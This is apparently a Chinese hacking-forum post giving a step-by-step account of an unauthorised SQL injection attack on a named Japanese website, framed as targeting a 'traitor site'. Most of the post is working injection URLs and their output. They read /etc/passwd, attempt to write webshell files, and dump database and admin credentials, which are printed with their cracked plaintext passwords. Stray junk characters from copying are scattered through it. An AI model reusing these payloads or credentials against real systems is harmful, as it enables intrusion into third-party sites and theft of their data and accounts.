原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

" b+ h) W( M# Q' K8 F/ C! _0x01. 检测 www.zuaa.jp 收集数据
; w' a" \6 C: N; m* V
) L" j, u9 l3 e% _
whatweb
9 G) C, ~' W2 j$ P. i9 Z
: \% l9 x8 |$ x& z. K
利用NMAP扫描
& [9 }3 D& r9 \) N+ x9 W  v
2 m4 U) s  _" H7 m中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
& k: g/ M  Y- {0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
: z$ `: k9 v' O
& j' ^% A; |) \2 T/ c0 H  m- t
/ u3 f/ \( w# g' ]) e0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
& k) E" u) K1 M0 }! C
- T/ y' ^) L! a% R$ uorder by 28报错，order by 27正常

0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
7 K. B8 r9 v- j: C
; h2 l' m  y: a5 d; l0x05. info:
& T" Q/ E, y; C, F: g" Ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
database:    openpne
: ~# t7 o1 X* c7 fversion:      4.1.22
, y1 V, L: o  L& s( f/ ?os:             portbld-freebsd5.4

0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
% J2 y; d& ]  K1 Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ i7 {% ]+ _$ a/ n5 z( \  |
通过工具转换
8 e* d) h( y6 G, R$ c; v+ E$ f- F& _
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
, x9 Z/ N8 l: C0 n  K
0x07. 利用 into outfile
全部都失败
1 y5 c! }/ [5 \1 whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
/ C" x3 J& ~! M3 O
$ a8 m1 v# L, ]. C! K- _- b: Nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
% c7 j1 _% P  I+ m! I9 Z( p
5 M# [( F2 P; _% ?6 W. r0x08. 利用 mysql 4.1
4 y% K' G3 {! D% R. g, x8 T猜常规表名，字段未果 工具 sqlmap
2 Z  I' H- N1 D7 G中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 z' n/ D8 X( s! |


0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
; C' Y* C2 Z$ \& M1 N; |可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

2 ^; h% M! p- m+ G2 l这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

0 n1 B; W5 |- ?: ]& o
+ a' c! d) ]0 ?3 q$ o0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
, \6 S4 _* m. O+ v3 J

0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
2 q5 H/ [' I" Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
2 t* v1 ]" J0 W7 q
& c$ q8 g$ U4 a8 Q6 ^0 h& O8 Z解密
( W: u& f5 _" `1 k  O2 Hzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
, v* D9 \* Z5 U* Uzuaajp:c0923ec5857796a393da99905008c176,          zju1897
1 q' V4 h8 c" q; `
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台


0 a6 J. k. ~. X. k
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
* m' _- u9 n' J0 B; H感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. [; o9 J6 w0 i1 D4 `: C, k1 {------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

" E2 N) i, [' x$ Q9 A8 H/ y最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
/ a3 [$ m: A# q% B: z

荒村狂客

哪个牛人 费的这劲 入侵的